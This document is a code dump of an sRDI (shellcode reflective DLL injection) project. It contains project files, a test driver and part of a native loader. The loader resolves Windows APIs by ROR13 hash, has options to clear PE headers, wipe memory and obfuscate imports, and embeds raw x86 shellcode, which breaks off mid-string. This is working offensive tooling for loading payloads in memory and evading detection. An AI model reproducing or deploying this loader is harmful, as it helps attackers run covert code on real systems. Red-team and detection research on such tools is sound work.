├── .gitignore
├── DotNet
├── App.config
├── DotNet.csproj
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── FunctionTest
├── FunctionTest.cpp
├── FunctionTest.vcxproj
├── FunctionTest.vcxproj.filters
├── stdafx.cpp
├── stdafx.h
└── targetver.h
├── LICENSE
├── Native
├── Loader.cpp
├── Native.vcxproj
├── Native.vcxproj.filters
├── stdafx.cpp
├── stdafx.h
└── targetver.h
├── PowerShell
├── ConvertTo-Shellcode.ps1
└── Invoke-Shellcode.ps1
├── Python
├── ConvertToShellcode.py
├── Python.pyproj
└── ShellcodeRDI.py
├── README.md
├── ShellcodeRDI.sln
├── ShellcodeRDI
├── GetProcAddressWithHash.h
├── ShellcodeRDI.c
├── ShellcodeRDI.vcxproj
├── ShellcodeRDI.vcxproj.filters
└── function_link_order.txt
├── TestDLL
├── Resource.rc
├── TestDLL.vcxproj
├── TestDLL.vcxproj.filters
├── dllmain.cpp
└── resource.h
├── bin
└── .gitignore
└── lib
├── PowerShell
├── Get-FunctionHash.ps1
├── Get-LibSymbols.ps1
├── Get-ObjDump.format.ps1xml
├── Get-PEHeader.ps1
└── Out-Shellcode.ps1
└── Python
├── EncodeBlobs.py
└── FunctionToHash.py
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Oo]bj/
24 | [Ll]og/
25 |
26 | # Visual Studio 2015 cache/options directory
27 | .vs/
28 | # Uncomment if you have tasks that create the project's static files in wwwroot
29 | #wwwroot/
30 |
31 | # MSTest test Results
32 | [Tt]est[Rr]esult*/
33 | [Bb]uild[Ll]og.*
34 |
35 | # NUNIT
36 | *.VisualState.xml
37 | TestResult.xml
38 |
39 | # Build Results of an ATL Project
40 | [Dd]ebugPS/
41 | [Rr]eleasePS/
42 | dlldata.c
43 |
44 | # .NET Core
45 | project.lock.json
46 | project.fragment.lock.json
47 | artifacts/
48 | **/Properties/launchSettings.json
49 |
50 | *_i.c
51 | *_p.c
52 | *_i.h
53 | *.ilk
54 | *.meta
55 | *.obj
56 | *.pch
57 | *.pdb
58 | *.pgc
59 | *.pgd
60 | *.rsp
61 | *.sbr
62 | *.tlb
63 | *.tli
64 | *.tlh
65 | *.tmp
66 | *.tmp_proj
67 | *.log
68 | *.vspscc
69 | *.vssscc
70 | .builds
71 | *.pidb
72 | *.svclog
73 | *.scc
74 |
75 | # Chutzpah Test files
76 | _Chutzpah*
77 |
78 | # Visual C++ cache files
79 | ipch/
80 | *.aps
81 | *.ncb
82 | *.opendb
83 | *.opensdf
84 | *.sdf
85 | *.cachefile
86 | *.VC.db
87 | *.VC.VC.opendb
88 |
89 | # Visual Studio profiler
90 | *.psess
91 | *.vsp
92 | *.vspx
93 | *.sap
94 |
95 | # TFS 2012 Local Workspace
96 | $tf/
97 |
98 | # Guidance Automation Toolkit
99 | *.gpState
100 |
101 | # ReSharper is a .NET coding add-in
102 | _ReSharper*/
103 | *.[Rr]e[Ss]harper
104 | *.DotSettings.user
105 |
106 | # JustCode is a .NET coding add-in
107 | .JustCode
108 |
109 | # TeamCity is a build add-in
110 | _TeamCity*
111 |
112 | # DotCover is a Code Coverage Tool
113 | *.dotCover
114 |
115 | # Visual Studio code coverage results
116 | *.coverage
117 | *.coveragexml
118 |
119 | # NCrunch
120 | _NCrunch_*
121 | .*crunch*.local.xml
122 | nCrunchTemp_*
123 |
124 | # MightyMoose
125 | *.mm.*
126 | AutoTest.Net/
127 |
128 | # Web workbench (sass)
129 | .sass-cache/
130 |
131 | # Installshield output folder
132 | [Ee]xpress/
133 |
134 | # DocProject is a documentation generator add-in
135 | DocProject/buildhelp/
136 | DocProject/Help/*.HxT
137 | DocProject/Help/*.HxC
138 | DocProject/Help/*.hhc
139 | DocProject/Help/*.hhk
140 | DocProject/Help/*.hhp
141 | DocProject/Help/Html2
142 | DocProject/Help/html
143 |
144 | # Click-Once directory
145 | publish/
146 |
147 | # Publish Web Output
148 | *.[Pp]ublish.xml
149 | *.azurePubxml
150 | # TODO: Comment the next line if you want to checkin your web deploy settings
151 | # but database connection strings (with potential passwords) will be unencrypted
152 | *.pubxml
153 | *.publishproj
154 |
155 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
156 | # checkin your Azure Web App publish settings, but sensitive information contained
157 | # in these scripts will be unencrypted
158 | PublishScripts/
159 |
160 | # NuGet Packages
161 | *.nupkg
162 | # The packages folder can be ignored because of Package Restore
163 | **/packages/*
164 | # except build/, which is used as an MSBuild target.
165 | !**/packages/build/
166 | # Uncomment if necessary however generally it will be regenerated when needed
167 | #!**/packages/repositories.config
168 | # NuGet v3's project.json files produce more ignorable files
169 | *.nuget.props
170 | *.nuget.targets
171 |
172 | # Microsoft Azure Build Output
173 | csx/
174 | *.build.csdef
175 |
176 | # Microsoft Azure Emulator
177 | ecf/
178 | rcf/
179 |
180 | # Windows Store app package directories and files
181 | AppPackages/
182 | BundleArtifacts/
183 | Package.StoreAssociation.xml
184 | _pkginfo.txt
185 |
186 | # Visual Studio cache files
187 | # files ending in .cache can be ignored
188 | *.[Cc]ache
189 | # but keep track of directories ending in .cache
190 | !*.[Cc]ache/
191 |
192 | # Others
193 | ClientBin/
194 | ~$*
195 | *~
196 | *.dbmdl
197 | *.dbproj.schemaview
198 | *.jfm
199 | *.pfx
200 | *.publishsettings
201 | orleans.codegen.cs
202 |
203 | # Since there are multiple workflows, uncomment next line to ignore bower_components
204 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
205 | #bower_components/
206 |
207 | # RIA/Silverlight projects
208 | Generated_Code/
209 |
210 | # Backup & report files from converting an old project file
211 | # to a newer Visual Studio version. Backup files are not needed,
212 | # because we have git ;-)
213 | _UpgradeReport_Files/
214 | Backup*/
215 | UpgradeLog*.XML
216 | UpgradeLog*.htm
217 |
218 | # SQL Server files
219 | *.mdf
220 | *.ldf
221 | *.ndf
222 |
223 | # Business Intelligence projects
224 | *.rdl.data
225 | *.bim.layout
226 | *.bim_*.settings
227 |
228 | # Microsoft Fakes
229 | FakesAssemblies/
230 |
231 | # GhostDoc plugin setting file
232 | *.GhostDoc.xml
233 |
234 | # Node.js Tools for Visual Studio
235 | .ntvs_analysis.dat
236 | node_modules/
237 |
238 | # Typescript v1 declaration files
239 | typings/
240 |
241 | # Visual Studio 6 build log
242 | *.plg
243 |
244 | # Visual Studio 6 workspace options file
245 | *.opt
246 |
247 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
248 | *.vbw
249 |
250 | # Visual Studio LightSwitch build output
251 | **/*.HTMLClient/GeneratedArtifacts
252 | **/*.DesktopClient/GeneratedArtifacts
253 | **/*.DesktopClient/ModelManifest.xml
254 | **/*.Server/GeneratedArtifacts
255 | **/*.Server/ModelManifest.xml
256 | _Pvt_Extensions
257 |
258 | # Paket dependency manager
259 | .paket/paket.exe
260 | paket-files/
261 |
262 | # FAKE - F# Make
263 | .fake/
264 |
265 | # JetBrains Rider
266 | .idea/
267 | *.sln.iml
268 |
269 | # CodeRush
270 | .cr/
271 |
272 | # Python Tools for Visual Studio (PTVS)
273 | __pycache__/
274 | *.pyc
275 |
276 | # Cake - Uncomment if you are using it
277 | # tools/**
278 | # !tools/packages.config
279 |
280 | # Telerik's JustMock configuration file
281 | *.jmconfig
282 |
283 | # BizTalk build output
284 | *.btp.cs
285 | *.btm.cs
286 | *.odx.cs
287 | *.xsd.cs
288 |
--------------------------------------------------------------------------------
/DotNet/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DotNet/DotNet.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {FD50DEE9-91AB-4449-BA55-27C71098076B}
8 | Exe
9 | Properties
10 | RDIShellcodeLoader
11 | RDIShellcodeLoader
12 | v3.5
13 | 512
14 | true
15 | publish\
16 | true
17 | Disk
18 | false
19 | Foreground
20 | 7
21 | Days
22 | false
23 | false
24 | true
25 | 0
26 | 1.0.0.%2a
27 | false
28 | false
29 | true
30 |
31 |
32 |
33 | true
34 | bin\x64\Debug\
35 | DEBUG;TRACE
36 | true
37 | full
38 | x64
39 | prompt
40 | MinimumRecommendedRules.ruleset
41 | false
42 |
43 |
44 | bin\x64\Release\
45 | TRACE
46 | true
47 | pdbonly
48 | x64
49 | prompt
50 | MinimumRecommendedRules.ruleset
51 | false
52 |
53 |
54 | true
55 | bin\x86\Debug\
56 | DEBUG;TRACE
57 | true
58 | full
59 | x86
60 | prompt
61 | MinimumRecommendedRules.ruleset
62 | false
63 |
64 |
65 | bin\x86\Release\
66 | TRACE
67 | true
68 | pdbonly
69 | x86
70 | prompt
71 | MinimumRecommendedRules.ruleset
72 | false
73 |
91 | False
92 | Microsoft .NET Framework 4.5.2 %28x86 and x64%29
93 | true
94 |
95 |
96 | False
97 | .NET Framework 3.5 SP1
98 | false
99 |
100 |
101 |
102 |
103 | copy /y $(TargetPath) $(SolutionDir)bin\DotNetLoader_$(PlatformName).exe
104 |
105 |
112 |
--------------------------------------------------------------------------------
/DotNet/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("RDIShellcodeLoader")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("RDIShellcodeLoader")]
13 | [assembly: AssemblyCopyright("Copyright © 2015")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("fd50dee9-91ab-4449-ba55-27c71098076b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/FunctionTest/FunctionTest.cpp:
--------------------------------------------------------------------------------
1 | // FunctionTest.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 | #include
7 |
8 | #define SRDI_CLEARHEADER 0x1
9 | #define SRDI_CLEARMEMORY 0x2
10 | #define SRDI_OBFUSCATEIMPORTS 0x4
11 |
12 | #define DEREF_64( name )*(DWORD64 *)(name)
13 | #define DEREF_32( name )*(DWORD *)(name)
14 | #define DEREF_16( name )*(WORD *)(name)
15 | #define DEREF_8( name )*(BYTE *)(name)
16 |
17 | #define RVA(type, base, rva) (type)((ULONG_PTR) base + rva)
18 |
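// Resolve an exported function by name from a PE image mapped at hModule,
// without calling GetProcAddress.
//
// Walks the image's export directory: AddressOfNames gives each export's name,
// AddressOfNameOrdinals maps that name to an index into AddressOfFunctions.
//
// hModule     base of the mapped image (NULL is rejected)
// lpProcName  export name to look up; compared case-insensitively with
//             _stricmp, as in the original
// returns     address of the export, or NULL when an argument is NULL, the
//             image has no export directory, or the name is not found
//
// NOTE: the image is otherwise trusted to be well-formed — e_lfanew and the
// directory RVAs are not range-checked against the mapped size. The one guard
// added here is that a name ordinal pointing past AddressOfFunctions is
// skipped instead of being used for an out-of-bounds read.
FARPROC GetProcAddressR(HMODULE hModule, LPCSTR lpProcName)
{
    if (hModule == NULL || lpProcName == NULL)
        return NULL;

    PIMAGE_NT_HEADERS ntHeaders = RVA(PIMAGE_NT_HEADERS, hModule, ((PIMAGE_DOS_HEADER)hModule)->e_lfanew);
    PIMAGE_DATA_DIRECTORY dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (!dataDir->Size)
        return NULL;

    PIMAGE_EXPORT_DIRECTORY exportDir = RVA(PIMAGE_EXPORT_DIRECTORY, hModule, dataDir->VirtualAddress);
    if (!exportDir->NumberOfNames || !exportDir->NumberOfFunctions)
        return NULL;

    PDWORD expName = RVA(PDWORD, hModule, exportDir->AddressOfNames);
    PWORD expOrdinal = RVA(PWORD, hModule, exportDir->AddressOfNameOrdinals);
    PDWORD expFunctions = RVA(PDWORD, hModule, exportDir->AddressOfFunctions);

    for (DWORD i = 0; i < exportDir->NumberOfNames; i++, expName++, expOrdinal++) {
        LPCSTR expNameStr = RVA(LPCSTR, hModule, *expName);
        if (!expNameStr)
            break;

        if (_stricmp(lpProcName, expNameStr) != 0)
            continue;

        // The name ordinal indexes AddressOfFunctions; a malformed table could
        // point past it, so fail closed rather than read out of bounds.
        if (*expOrdinal >= exportDir->NumberOfFunctions)
            continue;

        return RVA(FARPROC, hModule, expFunctions[*expOrdinal]);
    }

    return NULL;
}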
52 |
53 |
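// Read an entire file into a freshly malloc'd buffer.
//
// filename  path to open in binary mode
// data      on success receives the malloc'd buffer (caller frees it); it is
//           allocated with one spare byte past `size`, which is set to NUL
//           (the original allocated the byte but never wrote it)
// size      on success receives the number of bytes read
// returns   true (1) on success, false (0) on failure; DWORD keeps the
//           original signature, callers test it as a boolean
//
// Failure paths now handled explicitly: fopen failure, fseek/ftell error
// (ftell reports -1L, which the original stored as a huge size), malloc
// failure (the original then wrote through NULL), and a short read. On every
// failure the stream is closed and *data / size are left untouched.
DWORD GetFileContents(LPCSTR filename, LPSTR *data, DWORD &size)
{
    if (filename == NULL || data == NULL)
        return false;

    std::FILE *fp = std::fopen(filename, "rb");
    if (!fp)
        return false;

    // Measure the file by seeking to its end.
    long fileSize = -1L;
    if (fseek(fp, 0, SEEK_END) == 0)
        fileSize = ftell(fp);

    if (fileSize < 0 || fseek(fp, 0, SEEK_SET) != 0) {
        fclose(fp);
        return false;
    }

    LPSTR buffer = (LPSTR)malloc((size_t)fileSize + 1);
    if (buffer == NULL) {
        fclose(fp);
        return false;
    }

    // Element size 1 so the return value is the byte count actually read,
    // which makes a short read detectable.
    size_t bytesRead = fread(buffer, 1, (size_t)fileSize, fp);
    fclose(fp);

    if (bytesRead != (size_t)fileSize) {
        free(buffer);
        return false;
    }

    buffer[bytesRead] = '\0';
    *data = buffer;
    size = (DWORD)bytesRead;
    return true;
}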
71 |
72 | #define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
73 |
// Hash a NUL-terminated name with the rotate-right-13 scheme used throughout
// this project.
//
// Every byte is folded in as hash = ROTR32(hash, 13) + byte, and the loop
// runs once more for the terminating NUL, so the final rotation is part of
// the result. The byte is added through `char`, so for bytes >= 0x80 the
// value depends on the platform's char signedness — same as the original.
//
// name     NUL-terminated name; must not be NULL
// returns  32-bit hash
DWORD HashFunctionName(LPSTR name) {
    DWORD hash = 0;
    LPSTR cursor = name;
    bool more = true;

    while (more) {
        char c = *cursor++;
        hash = ROTR32(hash, 13) + c;
        more = (c != 0);
    }

    return hash;
}
86 |
87 | extern "C" ULONG_PTR LoadDLL(ULONG_PTR uiLibraryAddress, DWORD dwFunctionHash, LPVOID lpUserData, DWORD nUserdataLen, DWORD flags);
88 |
// Test driver: reads the architecture-matching TestDLL from ../bin and hands
// it to LoadDLL, selecting the "SayGoodbye" export by hash with the
// clear-header and clear-memory flags set.
//
// returns 0 on success, 1 when the DLL file cannot be read
int main()
{
#ifdef _WIN64
    LPCSTR fileName = "../bin/TestDLL_x64.dll";
#else
    LPCSTR fileName = "../bin/TestDLL_x86.dll";
#endif

    HMODULE user32 = LoadLibraryA("User32.dll"); // For MessageBox Testing

    LPSTR buffer = NULL;
    DWORD bufferSize = 0;
    DWORD ok = GetFileContents(fileName, &buffer, bufferSize);
    if (!ok || buffer == NULL) {
        printf("[!] Cannot read file.");
        return 1;
    }

    DWORD flags = SRDI_CLEARHEADER | SRDI_CLEARMEMORY; // | SRDI_OBFUSCATEIMPORTS | (3 << 16)
    LoadDLL((ULONG_PTR)buffer, HashFunctionName("SayGoodbye"), NULL, 0, flags);

    return 0;
}
118 |
119 |
--------------------------------------------------------------------------------
/FunctionTest/FunctionTest.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 15.0
23 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}
24 | Win32Proj
25 | FunctionTest
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
74 | true
75 |
76 |
77 | true
78 |
79 |
80 | false
81 |
82 |
83 | false
84 |
85 |
86 |
87 |
88 |
89 | Level3
90 | Disabled
91 | TESTING;WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 |
93 |
94 | Console
95 |
96 |
97 |
98 |
99 |
100 |
101 | Level3
102 | Disabled
103 | TESTING;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 |
105 |
106 | Console
107 |
108 |
109 |
110 |
111 | Level3
112 |
113 |
114 | MaxSpeed
115 | true
116 | true
117 | TESTING;WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 |
119 |
120 | Console
121 | true
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 |
129 |
130 | MaxSpeed
131 | true
132 | true
133 | TESTING;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
134 |
135 |
136 | Console
137 | true
138 | true
139 |
140 |
141 |
--------------------------------------------------------------------------------
/FunctionTest/FunctionTest.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/FunctionTest/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // FunctionTest.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/FunctionTest/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/FunctionTest/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Native/Loader.cpp:
--------------------------------------------------------------------------------
1 | // RDIShellcodeCLoader.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 | #include
7 |
8 | #define DEREF_64( name )*(DWORD64 *)(name)
9 | #define DEREF_32( name )*(DWORD *)(name)
10 | #define DEREF_16( name )*(WORD *)(name)
11 | #define DEREF_8( name )*(BYTE *)(name)
12 |
13 | #define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
14 | #define RVA(type, base, rva) (type)((ULONG_PTR) base + rva)
15 |
16 | #define SRDI_CLEARHEADER 0x1
17 | #define SRDI_CLEARMEMORY 0x2
18 | #define SRDI_OBFUSCATEIMPORTS 0x4
19 | #define SRDI_PASS_SHELLCODE_BASE 0x8
20 |
21 |
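// Resolve an exported function by name from a PE image mapped at hModule,
// without calling GetProcAddress.
//
// Walks the image's export directory: AddressOfNames gives each export's name,
// AddressOfNameOrdinals maps that name to an index into AddressOfFunctions.
//
// hModule     base of the mapped image (NULL is rejected)
// lpProcName  export name to look up; compared case-insensitively with
//             _stricmp, as in the original
// returns     address of the export, or NULL when an argument is NULL, the
//             image has no export directory, or the name is not found
//
// NOTE: the image is otherwise trusted to be well-formed — e_lfanew and the
// directory RVAs are not range-checked against the mapped size. The one guard
// added here is that a name ordinal pointing past AddressOfFunctions is
// skipped instead of being used for an out-of-bounds read.
FARPROC GetProcAddressR(HMODULE hModule, LPCSTR lpProcName)
{
    if (hModule == NULL || lpProcName == NULL)
        return NULL;

    PIMAGE_NT_HEADERS ntHeaders = RVA(PIMAGE_NT_HEADERS, hModule, ((PIMAGE_DOS_HEADER)hModule)->e_lfanew);
    PIMAGE_DATA_DIRECTORY dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (!dataDir->Size)
        return NULL;

    PIMAGE_EXPORT_DIRECTORY exportDir = RVA(PIMAGE_EXPORT_DIRECTORY, hModule, dataDir->VirtualAddress);
    if (!exportDir->NumberOfNames || !exportDir->NumberOfFunctions)
        return NULL;

    PDWORD expName = RVA(PDWORD, hModule, exportDir->AddressOfNames);
    PWORD expOrdinal = RVA(PWORD, hModule, exportDir->AddressOfNameOrdinals);
    PDWORD expFunctions = RVA(PDWORD, hModule, exportDir->AddressOfFunctions);

    for (DWORD i = 0; i < exportDir->NumberOfNames; i++, expName++, expOrdinal++) {
        LPCSTR expNameStr = RVA(LPCSTR, hModule, *expName);
        if (!expNameStr)
            break;

        if (_stricmp(lpProcName, expNameStr) != 0)
            continue;

        // The name ordinal indexes AddressOfFunctions; a malformed table could
        // point past it, so fail closed rather than read out of bounds.
        if (*expOrdinal >= exportDir->NumberOfFunctions)
            continue;

        return RVA(FARPROC, hModule, expFunctions[*expOrdinal]);
    }

    return NULL;
}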
55 |
// Report whether the PE image at uiLibraryAddress carries a PE32+ (64-bit)
// optional header, judged solely by OptionalHeader.Magic.
//
// uiLibraryAddress  base of the image; e_lfanew is followed without any
//                   validation, so the caller must pass a real PE image
// returns           TRUE when Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC, else FALSE
BOOL Is64BitDLL(UINT_PTR uiLibraryAddress)
{
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)uiLibraryAddress;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + dosHeader->e_lfanew);
    return ntHeaders->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC;
}
63 |
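// Read an entire file into a freshly malloc'd buffer.
//
// filename  path to open in binary mode
// data      on success receives the malloc'd buffer (caller frees it); it is
//           allocated with one spare byte past `size`, which is set to NUL
//           (the original allocated the byte but never wrote it)
// size      on success receives the number of bytes read
// returns   true (1) on success, false (0) on failure; DWORD keeps the
//           original signature, callers test it as a boolean
//
// Failure paths now handled explicitly: fopen failure, fseek/ftell error
// (ftell reports -1L, which the original stored as a huge size), malloc
// failure (the original then wrote through NULL), and a short read. On every
// failure the stream is closed and *data / size are left untouched.
DWORD GetFileContents(LPCSTR filename, LPSTR *data, DWORD &size)
{
    if (filename == NULL || data == NULL)
        return false;

    std::FILE *fp = std::fopen(filename, "rb");
    if (!fp)
        return false;

    // Measure the file by seeking to its end.
    long fileSize = -1L;
    if (fseek(fp, 0, SEEK_END) == 0)
        fileSize = ftell(fp);

    if (fileSize < 0 || fseek(fp, 0, SEEK_SET) != 0) {
        fclose(fp);
        return false;
    }

    LPSTR buffer = (LPSTR)malloc((size_t)fileSize + 1);
    if (buffer == NULL) {
        fclose(fp);
        return false;
    }

    // Element size 1 so the return value is the byte count actually read,
    // which makes a short read detectable.
    size_t bytesRead = fread(buffer, 1, (size_t)fileSize, fp);
    fclose(fp);

    if (bytesRead != (size_t)fileSize) {
        free(buffer);
        return false;
    }

    buffer[bytesRead] = '\0';
    *data = buffer;
    size = (DWORD)bytesRead;
    return true;
}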
81 |
// Hash a NUL-terminated name with the rotate-right-13 scheme used throughout
// this project.
//
// Every byte is folded in as hash = ROTR32(hash, 13) + byte, and the loop
// runs once more for the terminating NUL, so the final rotation is part of
// the result. The byte is added through `char`, so for bytes >= 0x80 the
// value depends on the platform's char signedness — same as the original.
//
// name     NUL-terminated name; must not be NULL
// returns  32-bit hash
DWORD HashFunctionName(LPSTR name) {
    DWORD hash = 0;
    LPSTR cursor = name;
    bool more = true;

    while (more) {
        char c = *cursor++;
        hash = ROTR32(hash, 13) + c;
        more = (c != 0);
    }

    return hash;
}
94 |
95 | BOOL ConvertToShellcode(LPVOID inBytes, DWORD length, DWORD userFunction, LPVOID userData, DWORD userLength, DWORD flags, LPSTR &outBytes, DWORD &outLength)
96 | {
97 |
98 | LPSTR rdiShellcode = NULL;
99 | DWORD rdiShellcodeLength, dllOffset, userDataLocation;
100 |
101 | #ifdef _DEBUG
102 | LPSTR rdiShellcode64 = NULL, rdiShellcode32 = NULL;
103 | DWORD rdiShellcode64Length = 0, rdiShellcode32Length = 0;
104 | GetFileContents("../bin/ShellcodeRDI_x64.bin", &rdiShellcode64, rdiShellcode64Length);
105 | GetFileContents("../bin/ShellcodeRDI_x86.bin", &rdiShellcode32, rdiShellcode32Length);
106 |
107 | #else
108 | //MARKER:S
109 | LPSTR rdiShellcode32 = "\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89\xAC\x24\xB4\x00\x00\x00\x89\x6C\x24\x38\x89\xAC\x24\xBC\x00\x00\x00\x89\xAC\x24\xC4\x00\x00\x00\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xB0\x00\x00\x00\x89\xAC\x24\xE0\x00\x00\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88